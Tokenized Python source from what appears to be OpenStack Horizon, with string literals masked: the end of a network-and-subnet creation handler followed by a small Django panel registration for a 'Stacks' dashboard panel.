'<STR_LIT>' ) % network . name <EOL> LOG . info ( msg ) <EOL> redirect = self . get_failure_url ( ) <EOL> exceptions . handle ( request , msg , redirect = redirect ) <EOL> def handle ( self , request , data ) : <EOL> network = self . _create_network ( request , data ) <EOL> if not network : <EOL> return False <EOL> if not data [ '<STR_LIT>' ] : <EOL> return True <EOL> subnet = self . _create_subnet ( request , data , network , no_redirect = True ) <EOL> if subnet : <EOL> return True <EOL> else : <EOL> self . _delete_network ( request , network ) <EOL> return False </s>
<s> from django . utils . translation import ugettext_lazy as _ <EOL> import horizon <EOL> from openstack_dashboard . dashboards . project import dashboard <EOL> class Stacks ( horizon . Panel ) : <EOL> name = _ ( "<STR_LIT>" ) <EOL> slug = "<STR_LIT>" <EOL> permissions = ( '<STR_LIT>' , ) <EOL> dashboard . Project . register ( Stacks ) </s>
